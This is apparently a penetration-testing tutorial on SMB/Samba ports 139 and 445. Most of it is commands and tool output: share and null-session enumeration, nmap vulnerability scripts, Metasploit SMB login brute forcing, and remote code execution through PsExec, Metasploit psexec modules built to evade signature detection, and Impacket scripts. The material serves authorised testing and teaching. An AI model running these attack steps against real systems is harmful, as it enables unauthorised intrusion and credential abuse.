Port 139 and 445- SMB/Samba

How to enumerate port 139/445 (SMB)


Samba is a service that allows a user to share files with other computers. It is interoperable, meaning it can share files between Linux and Windows systems: a Windows user simply sees a folder icon containing some files, even though the folder and files actually live on a Linux server.

Enumerate Hostname:

nmblookup is a NetBIOS over TCP/IP client used to look up NetBIOS names.

nmblookup -A 192.168.1.101

List Shares:

smbmap -H 192.168.1.101

nmap --script smb-enum-shares -p 139,445 192.168.1.101

Check for Null Sessions:

smbmap -H 192.168.1.101

# A tool to execute client side MS-RPC functions ((-U "" - null session )(-N - no password))
rpcclient -U "" -N 192.168.1.101

#An ftp-like client to access SMB shares
smbclient -L 192.168.1.101
smbclient \\\\192.168.1.101\\[share name]

Nmap scan for Vulnerabilities:

nmap --script smb-vuln* -p 139,445 192.168.1.101

Overall Scan:

enum4linux enumerates various SMB functions, such as:

  • output similar to nmblookup
  • check for null session
  • listing of shares
  • domain info
  • password policy
  • RID cycling output

enum4linux -a 192.168.1.101

Detect SMB version (Metasploit):

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.101:139 - Host could not be identified: Unix (Samba 2.2.1a)

SMB brute force:

This module tests an SMB login against a range of machines and reports successful logins.

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(scanner/smb/smb_login) > set rhosts 192.168.1.101
msf auxiliary(scanner/smb/smb_login) > set user_file /root/Desktop/users.txt
msf auxiliary(scanner/smb/smb_login) > set pass_file /root/Desktop/passwords.txt
msf auxiliary(scanner/smb/smb_login) > set stop_on_success true
msf auxiliary(scanner/smb/smb_login) > exploit

Connecting with PsExec:

PsExec.exe is a Sysinternals tool for accessing other machines on a network. It drops you straight into a shell on the remote PC without any manual setup on that host. Download it from http://download.sysinternals.com/files/PSTools.zip.

# After extracting the archive, run (the password placeholder replaces a value lost in extraction):
PsExec.exe \\192.168.1.101 -u administrator -p [password] cmd

Connecting with PsExec (Metasploit):

If you have SMB credentials you can use PsExec to log in easily. You can use either the standalone binary or the Metasploit module.

Windows Authenticated User Code Execution:

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. It is similar to the "psexec" utility provided by Sysinternals.

msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass [password]
msf exploit(windows/smb/psexec) > exploit

Windows Authenticated Powershell Command Execution:

This module uses a valid administrator username and password to execute a PowerShell payload using a method similar to the "psexec" utility provided by Sysinternals. The payload is base64-encoded and executed from the command line using PowerShell's -EncodedCommand flag. With this method the payload is never written to disk, and because each payload is unique, it is less prone to signature-based detection.

msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass [password]
msf exploit(windows/smb/psexec_psh) > exploit

Connecting with PsExec (Python):

Impacket psexec.py:

psexec.py lets you execute processes on remote Windows systems, copy files to them, process their output and stream it back. It gives a full interactive console for remote shell commands without installing any client software on the target.

git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install
cd examples
# Syntax is [domain/]user:password@target; the password placeholder replaces a value lost in extraction
python psexec.py SERVER/Administrator:[password]@[target]

Impacket atexec.py:

This tool executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install
cd examples

python atexec.py SERVER/Administrator:Ignite123@192.168.1.104 systeminfo
